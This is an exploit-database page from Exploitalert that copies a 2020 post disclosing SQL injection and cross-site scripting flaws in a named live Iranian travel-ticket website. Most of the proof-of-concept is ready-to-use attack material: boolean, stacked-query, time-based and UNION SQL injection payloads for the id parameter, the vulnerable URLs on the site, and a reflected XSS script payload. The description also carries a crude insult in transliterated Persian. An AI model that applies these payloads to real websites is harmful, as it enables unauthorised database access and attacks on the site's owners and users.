Advertisement






vark.ir - Multiple Vulnerability

CVE Category Price Severity
CVE-2020-6347 CWE-119 N/A Critical
Author Risk Exploitation Type Date
Amir Mohammed Alshanto High Remote 2020-01-24
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010187

Below is a copy:

vark.ir - Multiple Vulnerability
Exploit title: vark.ir - Multiple Vulnerability
Exploit author: amin
Date: Thursday - 2020 23 January
Tested on: Ubuntu 19.10 x64
-------------------------------------
[ Description ]

this site is for selling flying tickets va .... rajebe site kos o sher minevisi .


[ POC | Proof of Concept ]

SQL injection : 

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 7313=7313

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=3;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 2500 FROM (SELECT(SLEEP(5)))czHg)

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,CONCAT(0x7178717671,0x744a4743496a785465676f4a6a53486364785a4751716544566b4c4654446b426a47466c654a4a64,0x7162717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZTJb

http://vark.ir/show-hotel.php?id=[SQLi]
http://vark.ir/project.php?id=[SQLi]

XSS : 

Cross Site-Scripting
file : show-hotel.php
parameter : id

payload : "><script>alert('XSS')</script>


dar payan ham esm refighat miyary .

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum